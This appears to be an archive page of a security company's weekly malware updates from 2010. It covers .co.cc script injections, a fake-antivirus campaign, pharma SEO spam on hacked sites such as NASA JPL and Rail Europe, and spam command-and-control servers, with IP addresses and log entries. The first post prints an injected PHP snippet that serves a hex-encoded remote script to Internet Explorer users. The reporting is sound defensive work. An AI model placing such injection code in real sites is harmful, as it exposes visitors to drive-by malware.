Weekly malware update – 2010/Jan/31

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

.co.cc malicious entries

We reported those issues a while ago (here and here), but we are still seeing a large number of sites infected. The following code is added to a javascript file:

<?php $de=”HTTP_USER_AGENT“;$ar=$_SERVER[$de];if(stristr($ar,”MSIE“)&&stristr($ar,”Windows“))echo “Document.write(unescape(“%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%77%64%64%2E%63%6F%2E%63%63%2F%34%31%22%3E%3C%2F%73%63%72%69%..74%3E`));”

With an .htaccess modification to make such code work:

Read More

Malware update: ssl-verification.net

Quick malware update: The site ssl-verification.net (nice name) is being used to distribute SEO spam and malware (the famous fake AV). We recently wrote about the domain ssl-validation, but it seems that they disabled it and are using ssl-verification instead now.

You can get details of the code being used here: 7ea73e3ac775b52b945d5b45a5abb7ad and b99003ddc4a4815bb82a39cc6af3b452

All the infected sites so far had an encoded piece of PHP code inside their index.php or footer.php (if using WordPress) and a backdoor inside a random PHP file. We found the backdoor and by the analyzing logs, we could find the C&C IP address: 41.190.16.17.

41.190.16.17 – – [20/Oct/2010:03:35:21 -0700] “GET /img/readthat.php HTTP/1.1″ 200 11204 “http://phlks.com/doors/check_all.pl?5″ “Opera/9.80 (Macintosh; Intel Mac OS X; U; ru) Presto/2.2.15 Version/10.10″

What is interesting is that it seems the attackers are using http://phlks.com/doors/check_all.pl to manage their network of infected sites and according to Google, they have more than 4k sites under their control.

The malicious site is hosted at 85.17.213.243, so suggestion for hosting companies: Block this IP.


Having issues with malware? Sign up at http://sucuri.net and we will get it all sorted out.

NASA web site hacked and serving malware/spam

Some sites under NASA’s Jet Propulsion lab ( http://jpl.nasa.gov/ ) have been hacked and are being used on the infamous blackhat SEO Spam network. Not only that, but they are also serving malware to unsuspicious users.

The sites in question are http://ki.jpl.nasa.gov/, http://aviris.jpl.nasa.gov/ and a few others. Most of these malicious pages are well hidden in the site, for example at http://aviris.jpl.nasa.gov/cgi/ch/.cache/levitra-drug-impotence:

NASA with spam

You can also search on google for “cialis canada inurl:nasa.org” to find a few more pages and sites infected:

Read More

Rail Europe trying to sell me Amoxicillin – Pharma hack

I was looking to buy some Amoxicillin online today and didn’t want to get a prescription. So I went to Google and searched for it. Interesting enough, Rail Europe ( http://blog.raileurope.com ) was the first result.

Ok, so I’m kidding, I was not searching for Amoxicillin. I was however being truthful about Rail Europe being hacked with the infamous Blackhat SEO Spam (pharma) technique.

Infecting sites with ads for medicine to treat infections, how awesome is that?

Pharma hack

Read More

Blackhat SEO Spam C&C: wseow and seotoos up to no good!

We have been tracking these Blackhat SEO Spam C&C (command and control) servers for a while and thought it would be a good time to expose some of the details.

They have been actively trying to exploit blogs using old versions of WordPress to use them as part of their spam network.

IP addresses used:
94.75.221.117
94.75.221.118

Malware being used:
On the sites we’ve analyzed so far, wp-settings.php and index.php are hacked to load the SPAM, and to serve as a backdoor to the attackers.

This is the code added to the bottom of wp-settings.php:

http://sucuri.net/?page=tools&title=blacklist&detail=fe7b3ef5bba0429150672dfea5a66109

Read More

Success Magazine Blog Hit With Malware

We were analyzing some hacked sites today and one of them was full of SPAM. After some digging, we found that it was loading the Blackhat SEO Spam from blog.success.com (the official blog of Success Magazine).

We conducted a quick scan of their blog, we can see that it is being used to load all sorts of Pharma goodness:

Success spam

Read More

More spam: Google-traffic-analytics.com C&C server

We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:


Read More

Pharma hack and their C&C (Command & control) server

A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected you can double check your access.log for these entries:

94.76.241.4 – – [31/Jul/2010:06:07:59 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 374 “-” “-”
94.76.241.4 – – [31/Jul/2010:06:08:30 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 447 “-” “-”
94.76.241.4 – – [31/Jul/2010:11:06:55 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 444 “-” “-”
94.76.241.4 – – [30/Jul/2010:12:57:41 -0700] “POST /wp-content/themes/classic/comments.php HTTP/1.1″ 200 202 “-” “-”

This IP is hosted at Blueconnex and even after tons of abuse reports (from multiple sources), the’ve sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550


Read More